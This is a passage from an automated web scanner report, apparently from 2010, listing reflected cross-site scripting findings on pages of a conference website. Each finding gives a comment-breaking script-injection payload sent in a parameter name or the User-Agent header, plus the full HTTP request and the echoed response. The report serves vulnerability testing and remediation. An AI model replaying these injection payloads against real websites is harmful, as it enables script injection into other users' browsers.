<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@16ef0c99 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Schedules
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df923--><script>alert(1)</script>b1370082457 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:41:17 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842877387 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 44902
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@14d4514a adaptavist.builder.helper: com.atlass ...[SNIP]...
1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Sidebar
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aab21--><script>alert(1)</script>8f8e23b7fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:06 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842806553 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 34277
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7978200a adaptavist.builder.helper: com.atlass ...[SNIP]...
1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Sponsors
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e446f--><script>alert(1)</script>d63727a51fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:32 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842952469 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 42427
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1aa51ce1 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Twitter
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52c4c--><script>alert(1)</script>5fd2ec3b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:44 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842964524 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 48598
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4d21dfd4 adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a9adf--><script>alert(1)</script>e063112f8a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload cc315--><script>alert(1)</script>b009e1f4053 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload c556a--><script>alert(1)</script>8d773148ea2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Contact+Us HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:43:04 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842984417 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35861
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Contact+Us' contextPath : '' action name : 'viewpage' ** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload b82a0--><script>alert(1)</script>818a669cdc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2008 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:45:34 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289843134360 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 140842
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2008' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 739cc--><script>alert(1)</script>1003ca2f40e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2009 HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:47:07 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289843227872 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 174347
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2009' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9d682--><script>alert(1)</script>c9c2c6a7afd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 76fce--><script>alert(1)</script>67136241c2d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Javaholics HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:41:10 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842870583 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 131050
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Javaholics' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2f7bb--><script>alert(1)</script>62282269653 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Jboss HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:34 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842954866 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35546
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Jboss' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload aa6a7--><script>alert(1)</script>26499719511 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/News HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:36 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842836428 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 38185
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/News' contextPath : '' action name : 'viewpage' ******** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload f1c8f--><script>alert(1)</script>0d12e21b9d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Newsletter HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:52 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842972291 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 37931
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Newsletter' contextPath : '' action name : 'viewpage' ** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4db34--><script>alert(1)</script>867d6e034d4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Oracle HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:44 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842964740 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35037
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Oracle' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload cf8ba--><script>alert(1)</script>f98f0df6c51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Partners HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:25 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842825985 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 34092
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Partners' contextPath : '' action name : 'viewpage' **** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload ff364--><script>alert(1)</script>7b5293c13a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Practical HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:36 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842836934 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 35080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ff364--><script>alert(1)</script>7b5293c13a6' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Practical' contextPath : '' action name : 'viewpage' *** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload bfcd2--><script>alert(1)</script>4082871896 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Privacy+Policy HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:43:05 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842985586 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 41986
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bfcd2--><script>alert(1)</script>4082871896' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Privacy+Policy' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9affa--><script>alert(1)</script>0ec3a0f0447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
